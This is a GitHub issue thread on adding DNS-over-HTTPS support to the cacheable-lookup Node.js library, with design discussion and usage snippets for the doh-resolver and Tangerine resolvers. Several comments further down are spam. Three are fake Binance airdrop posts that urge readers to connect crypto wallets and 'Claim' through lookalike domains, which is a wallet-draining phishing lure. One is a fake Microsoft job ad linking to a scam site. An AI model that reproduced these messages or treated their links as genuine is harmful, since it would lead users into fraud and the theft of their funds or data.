### ISSUE TITLE
DNS over HTTPS support

### ISSUE THREAD

**Issue by szmarczak** [szmarczak/cacheable-lookup#40]

**Comment by lokesh411** [comment]
One question, would we be using cloudflare or google DoH APIs for this (https://cloudflare-dns.com/dns-query). Interested to contribute here

**Comment by szmarczak** [comment]
I think the CloudFlare one is a good start to implement, then we can do something like this:

```js
const cacheable = new CacheableLookup();

cacheable.servers = [
	  '8.8.8.8', // DNS over UDP/TCP
	  'https://1.1.1.1/dns-query', // DNS over HTTPS
];
```

There's a spec at https://datatracker.ietf.org/doc/html/rfc8484

---

I'd do this by storing HTTP/2 sessions in an object (key would be a string starting with `https://`). We can detect `cacheable.servers` changes in

https://github.com/szmarczak/cacheable-lookup/blob/45b18daf9f0c8406691fad81188e956641e2309d/source/index.js#L134-L138

so when it's updated, we close sessions that are no longer required and open new ones if there shall be. Then when a user makes a DNS request 

https://github.com/szmarczak/cacheable-lookup/blob/45b18daf9f0c8406691fad81188e956641e2309d/source/index.js#L240

we simply go through the list and send a HTTP/2 request to the DoH server and handle that. Note that `dns.Resolver` doesn't accept DoH servers so we need to filter the list before calling `resolver.setServers`.

---

It's possible that there may be multiple DoH servers. This can be quite a hassle, so no need to do this all in one PR.

**Comment by lokesh411** [comment]
Thanks, would go through the specification once, DoH queries should be round robin if multiple DoH servers are given right?

**Comment by szmarczak** [comment]
No, those should be fallback servers. As per [Node.js docs](https://nodejs.org/api/dns.html#dnssetserversservers):

> Fallback DNS servers will only be used if the earlier ones time out or result in some other error.

**Comment by lokesh411** [comment]
Got it, thanks

**Comment by Kikobeats** [comment]
I created [doh-resolver](https://github.com/Kikobeats/doh-resolver) to use DNS-over-HTTPS as resolver with  cacheable-lookup:

```
const CacheableLookup = require(https://github.com/szmarczak/cacheable-lookup)
const DoHResolver = require(https://github.com/Kikobeats/doh-resolver)
const https = require(['https'](https://nodejs.org/api/https.html))

const resolver = new DoHResolver({ servers: ['1.1.1.1', '8.8.8.8'] })

const cacheable = new CacheableLookup({ resolver })

https.get('https://example.com', { lookup: cacheable.lookup }, response => {
  // Handle the response here
})
```

**Comment by szmarczak** [comment]
Awesome! It's [quite heavy](https://packagephobia.com/result?p=doh-resolver) though, can you reduce the size?

**Comment by Kikobeats** [comment]
yea, I'm working on it; the main dependency is [dns2](https://github.com/Kikobeats/doh-resolver/blob/master/src/index.js#L4=) that is exporting a lot of things I really don't need

**Comment by szmarczak** [comment]
Are you sure?

![image](https://user-images.githubusercontent.com/36894700/177205496-1f3c9545-531b-47d2-8aa8-a768b596d3a9.png)

**Comment by Kikobeats** [comment]
gotcha; shipped `doh-resolver@1.2.0` that removes the logger dependency

<img width="856" alt="CleanShot 2022-07-05 at 10 54 47@2x" src="https://user-images.githubusercontent.com/2096101/177290316-2ca26b46-0b33-4ffa-8b05-8f26ab867893.png">

**Comment by szmarczak** [comment]
Awesome! Would you be up to sending a PR mentioning this in the docs?

**Comment by titanism** [comment]
PR #77 fixes this! 🎉 

See 🍊 [Tangerine](https://github.com/forwardemail/tangerine) and <https://github.com/forwardemail/tangerine/issues/1>.

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by titanism** [comment]
Reported as spam to GitHub

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by titanism** [comment]
Reported for spam

**Comment by Kikobeats** [comment]
BTW this is how I use `cacheable-lookup` with `tangerine` for getting DNS-over-HTTPs:

```js
new CacheableLookup({
  resolver: new Tangerine(
    {
      cache: false,
    },
    require('got').extend({
      responseType: 'buffer',
      decompress: false,
      retry: 0
    })
  )
})
```

If this looks good to @titanism I can create a PR to add it into the README 🙂

**Comment by titanism** [comment]
You're welcome to add whatever you like!  This nicely shows how it supports things other than `undici`.

**Comment by backend-jhjoo** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Jh9ra, @uhendsi, @manumpak1995, @jerex55, @alone-wolf, @ibracadabra022, @andy88890

**Comment by akashakki** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Join us and be part of a team dedicated to driving innovation and success!

## How to Apply:
To apply for this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.onir, @amitieMELex, @mozillo, @donadam2015, @newtonBlock, @fexploit, @opando, @therob3000, @cd365, @Hap-Hugh, @vinaypuranik, @kissthink, @priom, @amj24, @r-a-o, @MuhammedZakir, @oosman, @kiberpunk7702, @Adam8989, @jguittard
